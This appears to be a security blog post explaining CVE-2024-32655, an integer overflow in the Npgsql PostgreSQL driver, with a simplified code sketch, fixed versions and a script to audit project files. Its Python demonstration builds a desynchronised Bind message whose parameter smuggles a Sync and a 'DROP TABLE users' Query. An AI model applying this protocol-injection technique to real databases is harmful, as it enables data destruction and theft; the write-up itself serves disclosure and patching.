Npgsql is the open-source .NET data provider for PostgreSQL. In May 2024 a high-severity vulnerability, CVE-2024-32655, was disclosed in Npgsql: an integer overflow while building a PostgreSQL protocol message lets an attacker who controls enough parameter data inject arbitrary protocol messages into the database connection and execute arbitrary SQL with the application's database privileges, which can expose or modify sensitive data. This post walks through the root cause, a simplified sketch of the affected arithmetic, the fixed versions and the original references.

Vulnerability Details

The bug is in the WriteBind() method in src/Npgsql/Internal/NpgsqlConnector.FrontendMessages.cs. The method keeps the total message length and the running sum of parameter lengths in int (32-bit) variables. When the combined size of the parameters exceeds what an int can hold, both sums wrap around, so the length written into the message header no longer matches the bytes that follow it. This is an integer overflow, not a buffer overread: nothing is read out of bounds on the client, the damage is done on the wire.

Here is a simplified sketch of the affected arithmetic in NpgsqlConnector.FrontendMessages.cs (the identifiers are illustrative, not the verbatim Npgsql source):

// Fixed header bytes plus 2 bytes per parameter format code (illustrative sketch)
int messageLength = 4 + 2 + (buf.PreparedParams.Count + hydrationsMetadata.Count) * 2 + 2 + 4;
int totalParamLenSum = 0;   // 32-bit int: wraps once the parameter bytes exceed int.MaxValue

foreach (var param in buf.PreparedParams)
{
    totalParamLenSum += param.Value.Length;   // unchecked addition, silently wraps
    // -1 marks a NULL parameter: length prefix only, no value bytes
    messageLength += 4 + (param.Value.Length == -1 ? 0 : 4 + param.Value.Length);
}

When the sum wraps, Npgsql writes a length field that is far smaller than the real size of the Bind message it sends to the database. The server frames the incoming stream by that field: it consumes only the declared number of bytes as the Bind message and parses whatever follows as the start of new messages, even though those bytes are still part of the parameter data of the original Bind.

An attacker who controls enough of the parameter data to push the sum past the 32-bit limit can therefore place complete PostgreSQL protocol messages, for example a Sync followed by a Query, inside a parameter value, and the server will process them as if the application had sent them. The result is arbitrary SQL executed with the application's database privileges, however carefully the application itself parameterized its queries. The practical impact depends on what that database role is allowed to do: at minimum reading or modifying data the application should never expose, and for a privileged role any further capability the database server grants it.
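The framing behaviour described in the two paragraphs above, as an added example (this is not Npgsql's code): a small Python model of the int32 Bind length arithmetic, a minimal builder and framer for PostgreSQL frontend messages, and a constructed desynchronised stream. The Bind layout, the fixed-overhead constant and the sample parameters are assumptions of the example. It shows two things: with three parameters totalling 2^32 + 1022 bytes the wrapped sum records only 1022 (a total between 2^31 and 2^32 wraps negative, which the server rejects as an invalid message length), and, at a size that fits in memory, a Bind whose declared length stops short of an attacker-controlled parameter is framed by the server as a Bind followed by the attacker's Sync and Query messages. The Sync matters because the truncated Bind body is malformed: the backend answers it with an error and discards messages until the next Sync, so the injected Query has to come after one.

```python
import struct

# Added illustration, not Npgsql's code: models the int32 length arithmetic of
# a Bind writer and the PostgreSQL protocol desync a wrapped length causes.

INT32_MAX = 0x7FFFFFFF

def wrap_int32(n):
    """Emulate C# unchecked 'int' arithmetic: wrap into the signed 32-bit range."""
    n &= 0xFFFFFFFF
    return n - 0x100000000 if n >= 0x80000000 else n

# Fixed bytes of a minimal Bind (unnamed portal and statement, no format codes),
# counted the way the length field counts them: 4 (the length field itself)
# + 1 (empty portal name) + 1 (empty statement name) + 2 (format-code count)
# + 2 (parameter count) + 2 (result-format-code count). Assumed layout.
BIND_FIXED_OVERHEAD = 4 + 1 + 1 + 2 + 2 + 2

def bind_length_unchecked(param_lengths):
    """Length field as a plain int32 sum computes it (the vulnerable pattern)."""
    length = BIND_FIXED_OVERHEAD
    for n in param_lengths:
        length = wrap_int32(length + 4 + n)  # 4-byte length prefix per parameter
    return length

def bind_length_checked(param_lengths):
    """Same sum, refusing to wrap: the behaviour of a C# 'checked' block."""
    length = BIND_FIXED_OVERHEAD
    for n in param_lengths:
        length += 4 + n
        if length > INT32_MAX:
            raise OverflowError("Bind message does not fit an int32 length field")
    return length

def build_bind(params, declared_length=None):
    """Bind for the unnamed portal/statement with text-format parameters.
    declared_length overrides the int32 length field to model a wrapped sum."""
    body = b"\x00\x00" + struct.pack(">hh", 0, len(params))
    for p in params:
        body += struct.pack(">i", len(p)) + p
    body += struct.pack(">h", 0)
    length = 4 + len(body) if declared_length is None else declared_length
    return b"B" + struct.pack(">i", length) + body

def sync_message():
    """Sync: after an error the backend discards messages until it sees one."""
    return b"S" + struct.pack(">i", 4)

def query_message(sql):
    """Simple-protocol Query: 'Q', int32 length, NUL-terminated SQL."""
    payload = sql.encode() + b"\x00"
    return b"Q" + struct.pack(">i", 4 + len(payload)) + payload

def split_messages(stream):
    """Frame a frontend byte stream as the backend does: one type byte, then a
    big-endian int32 length that counts itself, then length-4 body bytes.
    Returns (messages, leftover); leftover is a trailing incomplete message
    the backend would keep waiting on."""
    messages, pos = [], 0
    while len(stream) - pos >= 5:
        kind = chr(stream[pos])
        (length,) = struct.unpack_from(">i", stream, pos + 1)
        if length < 4 or pos + 1 + length > len(stream):
            break  # the backend rejects length < 4; otherwise it waits for more bytes
        messages.append((kind, bytes(stream[pos + 5:pos + 1 + length])))
        pos += 1 + length
    return messages, bytes(stream[pos:])

# Constructed inputs for the demonstration.
# 1. Two parameters of INT32_MAX bytes plus a 1000-byte one total 2^32 + 1022
#    bytes; the wrapped int32 sum records only 1022.
WRAPPED_LENGTH = bind_length_unchecked([INT32_MAX, INT32_MAX, 1000])

# 2. The desync at a size that fits in memory: the second parameter is
#    attacker-controlled data holding a Sync and a Query. Declaring a length that
#    stops right before it does what the wrapped sum does past 4 GiB: the backend
#    ends the Bind early and frames the attacker's bytes as new messages.
INJECTED_SQL = "DROP TABLE users"
ATTACKER_PARAM = sync_message() + query_message(INJECTED_SQL)
HONEST_BIND = build_bind([b"42", ATTACKER_PARAM])
CUT = HONEST_BIND.index(ATTACKER_PARAM)  # offset where the attacker bytes start
DESYNCED_BIND = build_bind([b"42", ATTACKER_PARAM], declared_length=CUT - 1)

def demo():
    """Message types the backend would frame for the honest and desynced streams."""
    honest_types = [kind for kind, _ in split_messages(HONEST_BIND)[0]]
    desynced_types = [kind for kind, _ in split_messages(DESYNCED_BIND)[0]]
    return honest_types, desynced_types

if __name__ == "__main__":
    print("wrapped length field:", WRAPPED_LENGTH)
    print("honest stream frames as:", demo()[0])
    print("desynced stream frames as:", demo()[1])
```

Running it prints the wrapped length (1022) and the framed message types, `['B']` for the honest stream and `['B', 'S', 'Q']` for the desynced one, with the two trailing result-format bytes left over as an incomplete message the backend would wait on. bind_length_checked shows the arithmetic a fix needs, raising instead of wrapping; Npgsql's actual patch lives in the project's commit history and is not reproduced here.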

Fixed Versions

The Npgsql project fixed the overflow in releases 4.0.14, 4.1.13, 5.0.18, 6.0.11, 7.0.7 and 8.0.3. All Npgsql users should update to the patched release of their branch (or later) to mitigate CVE-2024-32655. Applications that pull Npgsql in transitively, for example through Npgsql.EntityFrameworkCore.PostgreSQL, need to check the resolved Npgsql version, not only their direct package references.
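A version check against the fixed releases, as an added example (not part of the original post and not Npgsql tooling). It parses a constructed .csproj string, which is an assumption of the example, and reports whether each direct Npgsql reference is at or past the fix release of its branch. Two conservative choices are built in and labelled in the code: a pre-release of a fix version is treated as unpatched, and a branch below 8.0 that is not in the list is reported as unpatched.

```python
import re
import xml.etree.ElementTree as ET

# Added example, not Npgsql tooling. Fix releases from the CVE-2024-32655 advisory.
FIXED_VERSIONS = ["4.0.14", "4.1.13", "5.0.18", "6.0.11", "7.0.7", "8.0.3"]

_VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)(-[0-9A-Za-z.]+)?")

def parse_version(text):
    """(major, minor, patch, release) with release=0 for a pre-release suffix,
    so that 8.0.3-preview.1 sorts below 8.0.3, as SemVer requires."""
    m = _VERSION_RE.fullmatch(text.strip())
    if m is None:
        raise ValueError(f"unrecognised version {text!r}")
    major, minor, patch, suffix = m.groups()
    return (int(major), int(minor), int(patch), 0 if suffix else 1)

_FIXES = [parse_version(v) for v in FIXED_VERSIONS]

def is_patched(version):
    """True when the version is at or past the fix release of its branch.
    Assumption (conservative): a branch absent from the list counts as patched
    only if it is newer than 8.0; anything older is reported as unpatched."""
    v = parse_version(version)
    for fix in _FIXES:
        if v[:2] == fix[:2]:
            return v >= fix
    return v > _FIXES[-1]

def npgsql_references(csproj_xml):
    """Direct Npgsql PackageReference versions in a .csproj (attribute or child element)."""
    root = ET.fromstring(csproj_xml)
    versions = []
    for ref in root.iter("PackageReference"):
        if ref.get("Include") == "Npgsql":
            versions.append(ref.get("Version") or (ref.findtext("Version") or "").strip())
    return versions

def audit(csproj_xml):
    """[(version, patched?)] for every direct Npgsql reference in the project file."""
    return [(v, is_patched(v)) for v in npgsql_references(csproj_xml)]

# Constructed project file for the demonstration (not a real project).
SAMPLE_CSPROJ = """<Project Sdk="Microsoft.NET.Sdk">
  <ItemGroup>
    <PackageReference Include="Npgsql" Version="8.0.2" />
    <PackageReference Include="Npgsql.EntityFrameworkCore.PostgreSQL" Version="8.0.2" />
  </ItemGroup>
</Project>"""

if __name__ == "__main__":
    for version, ok in audit(SAMPLE_CSPROJ):
        print(f"Npgsql {version}: {'patched' if ok else 'UPDATE REQUIRED'}")
```

The project file only shows direct references; the Entity Framework Core provider in the sample pulls Npgsql in as a dependency, so the resolved version is what matters, and `dotnet list package --include-transitive` is the place to read it from.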

Original References

1. Official CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32655
2. Npgsql Official Website: http://www.npgsql.org/
3. Npgsql GitHub Repository: https://github.com/npgsql/npgsql

Conclusion

CVE-2024-32655 is a high-severity integer overflow in Npgsql's Bind message writer that lets an attacker who controls large parameter values inject PostgreSQL protocol messages into the connection and run arbitrary SQL with the application's database privileges, exposing or altering sensitive data. Npgsql users should update to one of the fixed versions listed above.

Timeline

Published on: 05/14/2024 15:36:51 UTC
Last modified on: 06/04/2024 17:51:31 UTC